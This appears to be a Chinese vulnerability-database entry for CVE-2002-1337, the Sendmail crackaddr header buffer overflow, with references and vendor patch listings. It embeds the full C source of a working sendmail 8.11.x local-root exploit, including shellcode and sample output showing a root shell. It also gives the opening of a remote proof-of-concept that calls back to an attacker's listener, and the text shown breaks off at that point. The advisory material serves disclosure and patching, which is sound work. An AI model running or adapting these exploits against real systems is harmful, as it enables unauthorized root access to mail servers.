CVE-2002-1337
CVSS10.0
发布时间 :2003-03-07 00:00:00
修订时间 :2016-10-17 22:26:02
NMCOEPS    

[原文]Buffer overflow in Sendmail 5.79 to 8.12.7 allows remote attackers to execute arbitrary code via certain formatted address fields, related to sender and recipient header comments as processed by the crackaddr function of headers.c.


[CNNVD]Sendmail头处理远程溢出漏洞(CNNVD-200303-038)

        
        大多数组织在他们网络内部的各个位置有各种邮件传输代理(MTA),其中至少有一个直接连接于互联网。Sendmail是其中最流行的MTA,据统计通过Sendmail处理的Internet邮件流量占了总数的50%到75%。许多UNIX和Linux工作站默认运行Sendmail。
        Sendmail <8.12.8版本在处理和评估通过SMTP会话收集的邮件头部时存在一个远程溢出漏洞。当邮件头部包含地址或者地址列表(例如"From", "To", "CC")时,Sendmail会试图检查是否所提供的地址或地址列表是有效的。Sendmail使用crackaddr()函数来完成这一工作,这个函数位于Sendmail源码树中的headers.c文件中。
        Sendmail使用了一个静态缓冲区来存储所处理的数据。Sendmail会检测这个缓冲区,如果发现已经满了则停止向里面添加数据。Sendmail通过几个安全检查来保证字符被正确解释。然而其中一个安全检查存在安全缺陷,导致远程攻击者通过提交特制的地址域来造成一个缓冲区溢出。利用这个漏洞,攻击者可以获得Sendmail运行用户的权限,在大多数的Unix或者Linux系统上Sendmail都是以root用户身份运行。
        由于溢出发生在静态缓冲区中,不可执行堆栈保护对此漏洞没有作用。由于攻击代码可包含在看起来正常的邮件中,可以轻易地在不被发现的情况下穿透许多常见的包过滤设备或防火墙。 对未打补丁sendmail系统的成功利用在系统日志中不会留下任何消息。但是,在打过补丁的系统中,利用该漏洞的尝试会留下以下的日志消息:
         Dropped invalid comments from header address
        此漏洞影响Sendmail商业版以及开放源码的版本,另据报告此漏洞已经在实验室环境中被成功利用。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:sendmail:sendmail_switch:3.0.2
cpe:/o:sun:solaris:9.0::x86
cpe:/a:sendmail:sendmail:8.10.2Sendmail Sendmail 8.10.2
cpe:/a:sendmail:sendmail:8.12.0Sendmail Sendmail 8.12.0
cpe:/o:sun:solaris:7.0::x86
cpe:/a:sendmail:sendmail:8.10.1Sendmail Sendmail 8.10.1
cpe:/a:sendmail:sendmail:8.12.2Sendmail Sendmail 8.12.2
cpe:/a:sendmail:sendmail:8.12.1Sendmail Sendmail 8.12.1
cpe:/a:sendmail:sendmail:8.12.4Sendmail Sendmail 8.12.4
cpe:/a:sendmail:sendmail:8.12.3Sendmail Sendmail 8.12.3
cpe:/a:sendmail:sendmail:8.12.6Sendmail Sendmail 8.12.6
cpe:/a:sendmail:sendmail:8.12.5Sendmail Sendmail 8.12.5
cpe:/a:sendmail:sendmail_switch:2.2.1
cpe:/a:sendmail:sendmail_switch:2.2.4
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:8.0
cpe:/a:sendmail:sendmail_switch:3.0
cpe:/o:hp:hp-ux:11.11HP-UX 11.11
cpe:/a:sendmail:sendmail:3.0.2::nt
cpe:/a:sendmail:sendmail:3.0.1::nt
cpe:/o:windriver:bsdos:4.3.1Wind River Systems BSD 4.3.1
cpe:/a:sgi:freeware:1.0
cpe:/a:sendmail:sendmail_switch:2.1.3
cpe:/a:sendmail:sendmail_switch:2.1.4
cpe:/a:sendmail:sendmail_switch:2.1.1
cpe:/a:sendmail:sendmail:8.12.7Sendmail Sendmail 8.12.7
cpe:/a:sendmail:sendmail:8.9.3Sendmail Sendmail 8.9.3
cpe:/a:sendmail:sendmail:5.65
cpe:/o:gentoo:linux:1.4:rc2Gentoo Linux 1.4 rc2
cpe:/a:sendmail:sendmail:8.10Sendmail Sendmail 8.10
cpe:/a:sendmail:sendmail:8.9.0Sendmail Sendmail 8.9.0
cpe:/a:sendmail:sendmail:8.12:beta10Sendmail Sendmail 8.12 Beta10
cpe:/a:sendmail:sendmail:8.9.2Sendmail Sendmail 8.9.2
cpe:/a:sendmail:sendmail:5.61
cpe:/a:sendmail:sendmail:8.9.1Sendmail Sendmail 8.9.1
cpe:/o:windriver:bsdos:5.0Wind River Systems BSD 5.0
cpe:/o:sun:solaris:9.0::sparc
cpe:/o:hp:hp-ux:10.10HP HP-UX 10.10
cpe:/o:hp:hp-ux:11.22HP-UX 11i v1.6
cpe:/a:sendmail:sendmail:3.0::nt
cpe:/o:gentoo:linux:1.4:rc1Gentoo Linux 1.4 rc1
cpe:/a:sendmail:sendmail:2.6::nt
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:8.0::x86
cpe:/a:sendmail:sendmail:8.11.1Sendmail Sendmail 8.11.1
cpe:/a:sendmail:sendmail:8.11.0Sendmail Sendmail 8.11
cpe:/a:sendmail:sendmail:8.11.3Sendmail Sendmail 8.11.3
cpe:/a:sendmail:advanced_message_server:1.3Sendmail Sendmail Advanced Message Server 1.3
cpe:/a:sendmail:sendmail:8.11.2Sendmail Sendmail 8.11.2
cpe:/a:sendmail:sendmail:8.11.5Sendmail Sendmail 8.11.5
cpe:/a:sendmail:sendmail:8.12:beta12Sendmail Sendmail 8.12 Beta12
cpe:/a:sendmail:sendmail:8.11.4Sendmail Sendmail 8.11.4
cpe:/a:sendmail:sendmail:8.11.6Sendmail Sendmail 8.11.6
cpe:/a:sendmail:sendmail:8.12:beta16Sendmail Sendmail 8.12 Beta16
cpe:/o:netbsd:netbsd:1.5.1NetBSD 1.5.1
cpe:/o:sun:solaris:7.0
cpe:/a:sendmail:sendmail_switch:2.1.2
cpe:/o:netbsd:netbsd:1.5.3NetBSD 1.5.3
cpe:/o:netbsd:netbsd:1.5.2NetBSD 1.5.2
cpe:/o:netbsd:netbsd:1.6NetBSD 1.6
cpe:/a:sendmail:sendmail_switch:2.1
cpe:/o:netbsd:netbsd:1.5NetBSD 1.5
cpe:/a:sendmail:advanced_message_server:1.2Sendmail Sendmail Advanced Message Server 1.2
cpe:/a:sendmail:sendmail_switch:2.2
cpe:/o:hp:hp-ux:10.20HP HP-UX 10.20
cpe:/a:sendmail:sendmail:5.59
cpe:/a:sendmail:sendmail:8.12:beta5Sendmail Sendmail 8.12 Beta5
cpe:/a:sendmail:sendmail:8.12:beta7Sendmail Sendmail 8.12 beta7
cpe:/a:sendmail:sendmail_switch:2.2.2
cpe:/a:sendmail:sendmail:2.6.1::nt
cpe:/a:sendmail:sendmail_switch:2.2.3
cpe:/o:windriver:bsdos:4.2Wind River Systems BSD 4.2
cpe:/h:hp:alphaserver_scHP AlphaServer SC
cpe:/o:windriver:platform_sa:1.0Wind River Systems Platform SA 1.0
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/a:sendmail:sendmail:8.8.8Sendmail Sendmail 8.8.8
cpe:/a:sendmail:sendmail_switch:3.0.1
cpe:/o:hp:hp-ux:11.0.4HP HP-UX 11.0.4

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:2222Sendmail Address Processor Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1337
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1337
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-038
(官方数据源) CNNVD

- 其它链接及资源

ftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2003-002.txt.asc
(UNKNOWN)  NETBSD  NetBSD-SA2003-002
ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.6
(UNKNOWN)  CALDERA  CSSA-2003-SCO.6
ftp://ftp.sco.com/pub/updates/UnixWare/CSSA-2003-SCO.5
(UNKNOWN)  CALDERA  CSSA-2003-SCO.5
ftp://patches.sgi.com/support/free/security/advisories/20030301-01-P
(UNKNOWN)  SGI  20030301-01-P
http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000571
(UNKNOWN)  CONECTIVA  CLA-2003:571
http://frontal2.mandriva.com/security/advisories?name=MDKSA-2003:028
(UNKNOWN)  MANDRAKE  MDKSA-2003:028
http://marc.info/?l=bugtraq&m=104673778105192&w=2
(UNKNOWN)  BUGTRAQ  20030303 sendmail 8.12.8 available
http://marc.info/?l=bugtraq&m=104678739608479&w=2
(UNKNOWN)  BUGTRAQ  20030304 [LSD] Technical analysis of the remote sendmail vulnerability
http://marc.info/?l=bugtraq&m=104678862109841&w=2
(UNKNOWN)  BUGTRAQ  20030303 Fwd: APPLE-SA-2003-03-03 sendmail
http://marc.info/?l=bugtraq&m=104678862409849&w=2
(UNKNOWN)  BUGTRAQ  20030304 GLSA: sendmail (200303-4)
http://marc.info/?l=bugtraq&m=104679411316818&w=2
(UNKNOWN)  HP  HPSBUX0302-246
http://www-1.ibm.com/support/search.wss?rs=0&q=IY40500&apar=only
(UNKNOWN)  AIXAPAR  IY40500
http://www-1.ibm.com/support/search.wss?rs=0&q=IY40501&apar=only
(UNKNOWN)  AIXAPAR  IY40501
http://www-1.ibm.com/support/search.wss?rs=0&q=IY40502&apar=only
(UNKNOWN)  AIXAPAR  IY40502
http://www.cert.org/advisories/CA-2003-07.html
(VENDOR_ADVISORY)  CERT  CA-2003-07
http://www.debian.org/security/2003/dsa-257
(UNKNOWN)  DEBIAN  DSA-257
http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950
(VENDOR_ADVISORY)  ISS  20030303 Remote Sendmail Header Processing Vulnerability
http://www.iss.net/security_center/static/10748.php
(UNKNOWN)  XF  sendmail-header-processing-bo(10748)
http://www.kb.cert.org/vuls/id/398025
(UNKNOWN)  CERT-VN  VU#398025
http://www.redhat.com/support/errata/RHSA-2003-073.html
(UNKNOWN)  REDHAT  RHSA-2003:073
http://www.redhat.com/support/errata/RHSA-2003-074.html
(UNKNOWN)  REDHAT  RHSA-2003:074
http://www.redhat.com/support/errata/RHSA-2003-227.html
(UNKNOWN)  REDHAT  RHSA-2003:227
http://www.securityfocus.com/bid/6991
(VENDOR_ADVISORY)  BID  6991
http://www.sendmail.org/8.12.8.html
(VENDOR_ADVISORY)  CONFIRM  http://www.sendmail.org/8.12.8.html

- 漏洞信息

Sendmail头处理远程溢出漏洞
危急 边界条件错误
2003-03-07 00:00:00 2006-08-24 00:00:00
远程※本地  
        
        大多数组织在他们网络内部的各个位置有各种邮件传输代理(MTA),其中至少有一个直接连接于互联网。Sendmail是其中最流行的MTA,据统计通过Sendmail处理的Internet邮件流量占了总数的50%到75%。许多UNIX和Linux工作站默认运行Sendmail。
        Sendmail <8.12.8版本在处理和评估通过SMTP会话收集的邮件头部时存在一个远程溢出漏洞。当邮件头部包含地址或者地址列表(例如"From", "To", "CC")时,Sendmail会试图检查是否所提供的地址或地址列表是有效的。Sendmail使用crackaddr()函数来完成这一工作,这个函数位于Sendmail源码树中的headers.c文件中。
        Sendmail使用了一个静态缓冲区来存储所处理的数据。Sendmail会检测这个缓冲区,如果发现已经满了则停止向里面添加数据。Sendmail通过几个安全检查来保证字符被正确解释。然而其中一个安全检查存在安全缺陷,导致远程攻击者通过提交特制的地址域来造成一个缓冲区溢出。利用这个漏洞,攻击者可以获得Sendmail运行用户的权限,在大多数的Unix或者Linux系统上Sendmail都是以root用户身份运行。
        由于溢出发生在静态缓冲区中,不可执行堆栈保护对此漏洞没有作用。由于攻击代码可包含在看起来正常的邮件中,可以轻易地在不被发现的情况下穿透许多常见的包过滤设备或防火墙。 对未打补丁sendmail系统的成功利用在系统日志中不会留下任何消息。但是,在打过补丁的系统中,利用该漏洞的尝试会留下以下的日志消息:
         Dropped invalid comments from header address
        此漏洞影响Sendmail商业版以及开放源码的版本,另据报告此漏洞已经在实验室环境中被成功利用。
        

- 公告与补丁

        临时解决方法:
        这个漏洞没有好的临时解决方法。您应当尽快升级您的系统。如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 停止使用Sendmail。
        厂商补丁:
        Conectiva
        ---------
        Conectiva已经为此发布了一个安全公告(CLA-2003:571)以及相应补丁:
        CLA-2003:571:sendmail
        链接:
        http://distro.conectiva.com/atualizacoes/?id=a&anuncio=000571

        补丁下载:
        ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_3cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_3cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_3cl.i386.rpm
        FreeBSD
        -------
        FreeBSD已经发布了一个安全公告FreeBSD-SA-03:04以修复此漏洞:
        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-03:04.sendmail.asc
        HP
        --
        HP已经为此提供了SSRT3479跟踪号:
        HP HP-UX 10.10:
        HP Upgrade sendmail.886.10.01.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 10.10
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch sendmail.886.10.10.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP HP-UX 10.20:
        HP Patch PHNE_25183
        
        http://itrc.hp.com

        HP Upgrade sendmail.893.10.20.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 10.20
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch PHNE_28760
        
        http://itrc.hp.com

        HP HP-UX 11.0 4:
        HP Upgrade sendmail.811.11.00.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.04
        HP Upgrade sendmail.893.11.00.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.04
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch PHNE_29526
        ftp://ftp.itrc.hp.com/hp-ux_patches/s700_800/11.X/PHNE_29526
        HP Patch PHNE_25984
        
        http://itrc.hp.com

        HP HP-UX 11.0:
        HP Upgrade sendmail.811.11.00.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.00
        HP Upgrade sendmail.893.11.00.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.00
        HP Upgrade PHNE_24419
        Upgrade from Sendmail 8.8.6 to 8.9.3 for HP-UX 11.00.
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch PHNE_28809
        
        http://itrc.hp.com

        HP HP-UX 11.11:
        HP Upgrade sendmail.811.11.11.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.11
        HP Upgrade sendmail.893.11.11.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.11
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch sendmail.811.11.11.r1.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP Patch PHNE_28810
        
        http://itrc.hp.com

        HP HP-UX 11.22:
        HP Upgrade sendmail.811.11.22.gz
        sendmail@hprc.external.hp.com/" target="_blank">ftp://sendmail:sendmail@hprc.external.hp.com/
        HP-UX 11.22
        HP Patch HPSecurityBul246.depot.gz
        
        http://itrc.hp.com

        HP Patch PHNE_28409
        
        http://itrc.hp.com

        HP Patch t64v40gb17-c0028100-16887-es-20030211.tar
        ftp://ftp1.support.compaq.com/public/unix/v4.0g/t64v40gb17-c0028100-16887-es-20030211.tar
        Tru64 UNIX 4.0G PK3 (BL17) is required prior to installing this Early Release Patch Kit.
        HP Patch duv40fb18-c0092200-16888-es-20030211.tar
        ftp://ftp1.support.compaq.com/public/unix/v4.0f/duv40fb18-c0092200-16888-es-20030211.tar
        Tru64 UNIX 4.0 PK7 (BL18) is required prior to installing this Early Release Pat

- 漏洞信息 (411)

Sendmail 8.11.x Exploit (i386-Linux) (EDBID:411)
linux local
2001-01-01 Verified
0 sd
N/A [点击下载]
/*
	sendmail 8.11.x exploit (i386-Linux) by sd@sf.cz (sd@ircnet)
	~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

	This code exploits well-known local-root bug in sendmail 8.11.x,
	8.12.x may be vulnerable too, but I didn't test it.

	It gives instant root shell with +s sendmail 8.11.x, x < 6

	We're using objdump, gdb & grep in order to obtain VECT, so make sure
	that they're on $PATH, works with 80% accuracy on stripped binaries
	on several distros without changing offsets (rh7.0, rh7.1, suse7.2,
	slackware 8.0...)

	Greetz:

	mlg & smoke : diz is mostly for .ro ppl ;) killall sl3
	sorcerer    : stop da fuckin' asking me how to sploit sm, diz crap
	              is for lamers like you ;))))
	devik       : sm 0wns ;)
	to #linux.cz, #hack ....

	.... and to alot of other ppl, where i can't remeber theyr handles ;)

	args:
	-d     specify depth of analysis (default=32) [bigger = more time]
	-o     change offset (default = -32000) [between 1000..-64000]
	-v     specify victim (default /usr/sbin/sendmail) [+s sm binary]
	-t     specify temp directory (default /tmp/.sxp)
	       [temporary files, should be mounted as nosuid]

	An example (redhat 7.0 CZ):
-------------------------------------------------------------------------------
[sd@pikatchu sxp]$ gcc sx.c -o sx
[sd@localhost sxp]$ ./sx

...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001 ]=-...
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[*] Victim = /usr/sbin/sendmail
[*] Depth  = 32
[*] Offset = -16384
[*] Temp   = /tmp/.sxp
[*] ESP    = 0xbfffe708
[+] Created /tmp/.sxp
[+] Step 1. setuid() got = 0x080aa028
[*] Step 2. Copying /usr/sbin/sendmail to /tmp/.sxp/sm...OK
[*] Step 3. Disassembling /tmp/.sxp/sm...OK, found 3 targets
[*] Step 4. Exploiting 3 targets:
[1] (33% of targets) GOT=0x080aa028, VECT=0x00000064, offset=-16384
[2] (66% of targets) GOT=0x080aa028, VECT=0x080c6260, offset=-16384

Voila babe, entering rootshell!
Enjoy!
uid=0(root) gid=0(root) groups=0(root)
[root@pikatchu /]# whoami
root
[root@pikatchu /]# exit
exit
Thanx for choosing sd's products ;)
[sd@pikatchu sxp]$
--------------------------------------------------------------------------------

	Enjoy! And don't abuse it too much :)
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/wait.h>
#include <string.h>

#define	SM	"/usr/sbin/sendmail"
#define	OBJDUMP	"objdump"
#define	GDB	"gdb"
#define GREP	"grep"

#define	OURDIR	"/tmp/.sxp"

/* an basic regexp to get interesting stuff from disassembled output
   change it as you like if something doesn't work */

#define	DLINE	"%s -d %s 2> /dev/null | %s -B %d \"mov.*%%.l,(%%e..,%%e..,1)\" | %s \".mov .*0x80.*,%%e..\""
#define DLINEA	OBJDUMP, vict, GREP, depth, GREP

#define	BRUTE_DLINE	"%s -d %s 2> /dev/null | %s \".mov .*0x80.*,%%e..\""
#define BRUTE_DLINEA	OBJDUMP, vict, GREP


#define NOPLEN	32768

#define uchar unsigned char
#define NOP 0x90

/* 19 bytes ;), shell must be appended */
char shellcode[] =
	"\xeb\x0c\x5b\x31\xc0\x50\x89\xe1"
        "\x89\xe2\xb0\x0b\xcd\x80\xe8\xef"
        "\xff\xff\xff";


char	scode[512];
char	dvict[] = SM;

struct	target {
	uint	off;
	uint	brk;
	uint	vect;
};

unsigned int get_esp()
{
	__asm__("movl %esp,%eax");
}

char	ourdir[256] = OURDIR;

/* cleanup */
void	giveup(int i)
{
	char buf[256];
	sprintf(buf, "/bin/rm -rf %s > /dev/null 2> /dev/null", ourdir);
	system(buf);
	if (i >= 0) exit(i);
}

/* main sploit, stolen mostly from alsou.c ;) */
void	sploit(char *victim, uint got, uint vect, uint ret)
{
	uchar	egg[sizeof(scode) + NOPLEN + 5];
	char	s[512] = "-d";
	char	*argv[3];
	char	*envp[2];
	uint	first, last, i;

	strcpy(egg, "EGG=");
	memset(egg + 4, NOP, NOPLEN);
	strcpy(egg + 4 + NOPLEN, scode);

	last = first = -vect - (0xffffffff - got + 1);
	while (ret) {
		char	tmp[256];
		i = ret & 0xff;
		sprintf(tmp, "%u-%u.%u-", first, last, i);
		strcat(s, tmp);
		last = ++first;
		ret = ret >> 8;
	}
	s[strlen(s) - 1] = 0;
	argv[0] = victim;
	argv[1] = s;
	argv[2] = NULL;
	envp[0] = egg;
	envp[1] = NULL;
	execve(victim, argv, envp);
}

int	use(char *s)
{
	 printf("%s [command] [options]\n"
		"-h     this help\n"
		"-d     specify depth of analysis (default=32)\n"
		"-o     change offset (default = -32000)\n"
		"-v     specify victim (default /usr/sbin/sendmail)\n"
		"-t     specify temp directory (default /tmp/.sxp)\n"
		"-b	enables bruteforce (WARNING: this may take about 20-30 minutes!)\n", s);
	return 1;
}

/* exploited flag */
int	exploited = 0;

/* child root-shell will send us SIGUSR if everything is ok */
void	sigusr(int i)
{
	exploited++;
	giveup(-1);
}

int	main(int argc, char *argv[])
{
	char	victim[256] = SM;
	char	vict[256];
	char	gscr[256];
	char	path[256];
	
	char	d[256];
	struct	stat	st;
	FILE	*f;
	char	buf[256];
	int	got;

	struct	target t[1024];
	uint	off, ep, l;
	int	i,j;

	int	offset = -16384;
	int	esp;
	int	depth = 32;
	int	brute = 0;

	/* rootshell (if argv[0] == NULL) */
	if (!*argv) {
		/* open stdin and stdout */
		dup2(2, 0);
		dup2(2, 1);
		setuid(0);	/* regain root privs */
		setgid(0);
		/* send signal to parent that exploit is done */
		kill(getppid(), SIGUSR1);
		/* l-a-m-e ;) */
		printf("\nVoila babe, entering rootshell!\nEnjoy!\n"); fflush(stdout);
		chdir("/");
		system("/usr/bin/id");
		setenv("BASH_HISTORY", "/dev/null", 1);
		execl("/bin/bash", "-bash", NULL);
	}

	printf("\n...-=[ Sendmail 8.11.x exploit, (c)oded by sd@sf.cz [sd@ircnet], 2001 ]=-...\n"
	       "      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");

	while ( ( i = getopt(argc, argv, "hd:o:v:t:b") ) != EOF) {
		switch (i) {
			case 'd':
				if ((!optarg) || (sscanf(optarg, "%d", &depth) != 1))
					return use(argv[0]);
				break;
			case 'o':
				if ((!optarg) || (sscanf(optarg, "%d", &offset) != 1))
					return use(argv[0]);
				break;
			case 'v':
				if (!optarg) return use(argv[0]);
				strcpy(victim, optarg);
				break;
			case 't':
				if (!optarg) return use(argv[0]);
				strcpy(ourdir, optarg);
				break;
			case 'b':
				brute++;
				break;
			case 'h':
			default:
				return use(argv[0]);
		}
	}
	if (brute) printf("[*] Using brute force, this may take some time\n");
	/* create full path to rootshell, cause
           sendmail will change it's cwd */
	path[0] = 0;
	if (argv[0][0] != '/') {
		getcwd(path, 256);
	}

	/* construct shellcode */
	sprintf(scode, "%s%s/%s", shellcode, path, argv[0]);

	/* get stack frame */
	esp = get_esp();
	close(0);
	signal(SIGUSR1, sigusr);

	/* remove old stuff */
	giveup(-1);

	printf( "[*] Victim = %s\n"
		"[*] Depth  = %d\n"
		"[*] Offset = %d\n"
		"[*] Temp   = %s\n"
		"[*] ESP    = 0x%08x\n",
		victim,
		depth,
		offset,
		ourdir,
		esp);
	stat(victim, &st);
	if ((st.st_mode & S_ISUID) == 0) {
		printf("[-] Bad: %s isn't suid ;(\n", victim);
	}

	if (access(victim, R_OK + X_OK + F_OK) < 0) {
		printf("[-] Bad: We haven't access to %s !\n", victim);
	}

	if (mkdir(ourdir, 0777) < 0) {
		perror("[-] Can't create our tempdir!\n");
		giveup(1);
	}
	printf("[+] Created %s\n", ourdir);
	sprintf(buf, "%s -R %s | grep setuid", OBJDUMP, victim);
	f = popen(buf, "r");
	if (fscanf(f, "%x", &got) != 1) {
		pclose(f);
		printf("[-] Cannot get setuid() GOT\n");
		giveup(1);
	}
	/* get GOT */
	pclose(f);
	printf("[+] Step 1. setuid() got = 0x%08x\n", got);
	sprintf(vict, "%s/sm", ourdir);
	printf("[*] Step 2. Copying %s to %s...", victim, vict); fflush(stdout);
	sprintf(buf, "/bin/cp -f %s %s", victim, vict);
	system(buf);
	if (access(vict, R_OK + X_OK + F_OK) < 0) {
		perror("Failed");
		giveup(1);
	}
	printf("OK\n");
	/* disassemble & find targets*/
	printf("[*] Step 3. Disassembling %s...", vict); fflush(stdout);
	if (!brute) {
		sprintf(buf, DLINE, DLINEA);
	} else {
		sprintf(buf, BRUTE_DLINE, BRUTE_DLINEA);
	}
	f = popen(buf, "r");
	i = 0;
	while (fgets(buf, 256, f)) {
		int	k, dontadd = 0;
		if (sscanf(buf, "%x: %s %s %s %s %s %s 0x%x,%s\n",
                    &ep, d, d, d, d, d, d, &off, d) == 9) {
			/* same value ? */
			for (k=0; k < i; k++) {
				if (t[k].off == off) dontadd++;
			}
			/* new value ? */
			if (!dontadd) {
				/* add it to table */
				t[i].off = off;
				t[i++].brk = ep;
			}
		}
	}
	pclose(f);
	printf("OK, found %d targets\n", i);

	/* gdb every target and look for theyr VECT */
	printf("[*] Step 4. Exploiting %d targets:\n", i); fflush(stdout);
	sprintf(gscr, "%s/gdb", ourdir);

	off = 0;
	for (j=0; j < i; j++) {
		/* create gdb script */
		f = fopen(gscr, "w+");
		if (!f) {
			printf("Cannot create gdb script\n");
			giveup(1);
		}
		fprintf(f, "break *0x%x\nr -d1-1.1\nx/x 0x%x\n", t[j].brk, t[j].off);
		fclose(f);
		sprintf(buf, "%s -batch -x %s %s 2> /dev/null", GDB, gscr, vict);
		f = popen(buf, "r");
		if (!f) {
			printf("Failed to spawn gdb!\n");
			giveup(1);
		}
		/* scan gdb's output */
		while (1) {
			char buf[256];
			char *p;
			t[j].vect = 0;
			p = fgets(buf, 256, f);
			if (!p) break;
			if (sscanf(p, "0x%x %s 0x%x", &ep, d, &l) == 3) {
				t[j].vect = l;
				off++;
				break;
			}
		}
		pclose(f);
		if (t[j].vect) {
			int	pid;
			printf("[%d] (%d%% of targets) GOT=0x%08x, VECT=0x%08x, offset=%d\n", j, j*100/i , got, t[j].vect, offset);
			fflush(stdout);
			pid = fork();
			if (pid == 0) {
				close(1);
				sploit(victim, got, t[j].vect, esp + offset);
			}
			/* wait until sendmail finishes (expoit failed)
	                   or until SIGUSR arrives */
			wait(NULL);
			/* exploited ?? */
			if (exploited) {
				wait(NULL);	/* kill zombie */
				printf("Thanx for choosing sd's products ;)\n");
				exit(0);
			}
		}
	}
	printf("[-] All targets failed, probably not vulnerable ;(\n");
	giveup(1);
}

/* That's all. */



// milw0rm.com [2001-01-01]
		

- 漏洞信息 (22313)

Sendmail 8.12.x Header Processing Buffer Overflow Vulnerability (1) (EDBID:22313)
unix remote
2003-03-02 Verified
0 Last Stage of Delirium
N/A [点击下载]
source: http://www.securityfocus.com/bid/6991/info

Sendmail is prone to a remotely buffer-overflow vulnerability in the SMTP header parsing component. Successful attackers may exploit this vulnerability to gain control of affected servers.

Reportedly, this vulnerability may be locally exploitable if the sendmail binary is setuid/setgid.

Sendmail 5.2 to 8.12.7 are affected. Administrators are advised to upgrade to 8.12.8 or to apply patches to earlier versions of the 8.12.x tree. 

/*## copyright LAST STAGE OF DELIRIUM mar 2003 poland        *://lsd-pl.net/ #*/
/*## sendmail 8.11.6                                                         #*/

/* proof of concept code for remote sendmail vulnerability                    */
/* usage: linx86_sendmail target [-l localaddr] [-b localport] [-p ptr]       */
/*                               [-c count] [-t timeout] [-v 80]              */
/* where:                                                                     */
/*   target - address of the target host to run this code against             */
/*   localaddr - address of the host you are running this code from           */
/*   localport - local port that will listen for shellcode connection         */
/*   ptr - base ptr of the sendmail buffer containing our arbitrary data      */
/*   count - brute force loop counter                                         */
/*   timeout - select call timeout while waiting for shellcode connection     */
/*   v - version of the target OS (currently only Slackware 8.0 is supported) */
/*                                                                            */

#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>

#define NOP  0xf8
